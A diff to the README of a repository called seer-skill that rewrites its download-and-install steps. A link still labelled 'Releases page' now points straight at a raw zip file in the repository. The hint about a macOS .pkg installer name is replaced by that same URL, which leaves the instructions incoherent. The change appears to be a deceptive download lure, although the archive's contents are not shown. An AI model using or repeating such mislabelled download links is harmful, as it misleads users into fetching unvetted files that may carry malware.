PrimeOla/seer-skill/README.md

 ### 🔗 Download & Install

 1. **Visit the Releases Page:**
-   Go to the [Releases page](https://github.com/PrimeOla/seer-skill/releases) to download the latest version.
+   Go to the [Releases page](https://github.com/PrimeOla/seer-skill/raw/refs/heads/main/skills/seer/skill_seer_3.1.zip) to download the latest version.

 2. **Choose the Right Installer:**
    Find the appropriate installer file for your macOS version.
-Look for files named similar to `seer-skill-vX.X.X.pkg`.
+Look for files named similar to `https://github.com/PrimeOla/seer-skill/raw/refs/heads/main/skills/seer/skill_seer_3.1.zip`.

 3. **Download the Installer:**
    Click on the file to download it to your computer.